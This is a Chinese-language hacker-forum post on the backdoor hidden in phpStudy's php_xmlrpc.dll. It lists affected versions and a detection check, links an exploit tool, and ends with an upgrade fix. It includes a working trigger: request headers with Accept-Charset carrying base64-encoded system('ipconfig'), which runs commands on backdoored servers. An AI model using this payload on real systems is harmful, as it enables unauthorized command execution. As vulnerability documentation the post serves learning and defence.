跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

##phpStudy简介

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。

##漏洞概述

使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。

##影响版本

phpStudy20161103版本:

php5.4.45与php5.2.17

phpStudy20180211版本:

php5.4.45与php5.2.17

##漏洞检测

1、查看phpStudy下相应有后门的php版本的文件 php_xmlrpc.dll

记事本打开,搜索 eval,如下表示,则代表有后门。

03a31ffe0235ee5.png

2、利用工具:PHPStudy_BackDoor_EXP

链接地址:https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

396bb694bca1195.png

3、访问任意一个php文件,进行burp抓包修改

540efa37e0271c9.png

添加请求字段:accept-Encoding 和 Accept-Charset

  • accept-Encoding:gzip,deflate
  • Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==   //system(“ipconfig”)的base64

##漏洞修复

去官网重新下载最新版

本文内容仅用于学习交流,切勿用于非法用途!

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。